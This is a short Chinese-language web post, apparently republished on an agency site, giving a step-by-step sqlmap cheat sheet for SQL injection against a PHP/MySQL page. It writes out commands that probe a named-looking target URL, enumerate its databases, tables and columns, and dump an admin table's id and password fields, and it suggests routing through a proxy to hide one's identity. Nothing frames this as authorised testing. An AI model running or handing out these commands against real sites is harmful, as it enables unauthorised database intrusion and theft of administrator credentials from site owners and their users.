sqlmap注入常见用法一条龙

sqlmap是一个灰常强大的sql注入检测与辅助工具，但是由于没有图形界面，基本上用起来比较麻烦，导致很多人可能宁愿用havij或者是pangolin也不愿意麻烦去翻帮助界面，我自己也是把很多语句贴到了一个记事本里面用，其实真正用起来也就5,6句，也不会太复杂，下文以php+mysql为例：

检查注入点sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11

列数据库信息sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs

指定库名列出所有表sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 --tables

指定库名表名列出所有字段sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns

指定库名表名字段dump出指定字段sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump

有几个参数可能会用到，直接加在***面就可以了，更多详细参数见官方文档：

--cookie=COOKIE 在需要登录的地方，需要登录后的cookie

--proxy="http://127.0.0.1:8087" 使用HTTP代理隐藏自己的身份，比如使用goagent等

--sql-query=QUERY 执行一个sql语句，不一定支持

过程的几张图如下：

当前题目：sqlmap注入常见用法一条龙
URL分享：http://www.mswzjz.cn/qtweb/news40/352790.html

攀枝花网站建设、攀枝花网站运维推广公司-贝锐智能，是专注品牌与效果的网络营销公司；服务项目有等

广告

声明：本网站发布的内容（图片、视频和文字）以用户投稿、用户转载内容为主，如果涉及侵权请尽快告知，我们将会在第一时间删除。文章观点不代表本网站立场，如需处理请联系客服。电话：028-86922220；邮箱：631063699@qq.com。内容未经允许不得转载，或转载时需注明来源： 贝锐智能